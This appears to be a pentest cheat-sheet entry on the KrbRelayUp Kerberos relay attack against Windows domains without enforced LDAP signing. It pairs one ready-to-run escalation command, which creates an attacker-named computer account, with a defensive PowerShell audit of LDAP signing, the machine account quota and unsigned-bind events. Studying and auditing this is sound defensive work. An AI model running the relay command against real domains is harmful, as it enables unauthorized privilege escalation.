Kerberos Relaying

KrbRelayUp

A universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced (the default setting).

One of the requirements for this attack to work is for LDAP Signing to be disabled within the Active Directory environment.

# Escalate privileges using KrbRelayUp
.\KrbRelayUp.exe relay -Domain $domain -CreateNewComputerAccount -ComputerName $evilname -ComputerPassword $password 
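
A defender-side audit of the conditions the command above depends on, written as an added example (not part of the original page or of the KrbRelayUp project). It assumes it is run on a domain controller with the ActiveDirectory PowerShell module installed; the function names are hypothetical, and the machine account quota check is included because `-CreateNewComputerAccount` needs a user who is allowed to create computer accounts.

```powershell
# Added example: audit a domain controller for the preconditions of Kerberos relay to LDAP.

function Get-LdapSigningState {
    # LDAPServerIntegrity backs the policy "Domain controller: LDAP server signing requirements".
    # 2 = signing required; any other value, or no value, means unsigned binds are accepted.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
    $val = (Get-ItemProperty -Path $key -Name 'LDAPServerIntegrity' -ErrorAction SilentlyContinue).LDAPServerIntegrity
    [pscustomobject]@{
        Check    = 'LDAP server signing (LDAPServerIntegrity)'
        Value    = if ($null -eq $val) { 'not set' } else { $val }
        Hardened = ($val -eq 2)
    }
}

function Get-MachineAccountQuotaState {
    # A non-zero ms-DS-MachineAccountQuota (default 10) lets ordinary domain users
    # create computer accounts in the domain.
    Import-Module ActiveDirectory -ErrorAction Stop
    $root = Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties 'ms-DS-MachineAccountQuota'
    $maq  = $root.'ms-DS-MachineAccountQuota'
    [pscustomobject]@{
        Check    = 'ms-DS-MachineAccountQuota'
        Value    = $maq
        Hardened = ($maq -eq 0)
    }
}

function Get-UnsignedBindSummary {
    # Event 2887 in the Directory Service log is the DC's periodic summary of binds
    # performed without signing; review it before switching signing to "required".
    $ev = Get-WinEvent -FilterHashtable @{ LogName = 'Directory Service'; Id = 2887 } `
                       -MaxEvents 1 -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Check    = 'Unsigned LDAP binds (event 2887)'
        Value    = if ($ev) { "last logged $($ev.TimeCreated)" } else { 'no event found' }
        Hardened = (-not $ev)
    }
}

# Collect all three results; any row with Hardened = False needs attention.
@(Get-LdapSigningState; Get-MachineAccountQuotaState; Get-UnsignedBindSummary) |
    Format-Table -AutoSize -Wrap
```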
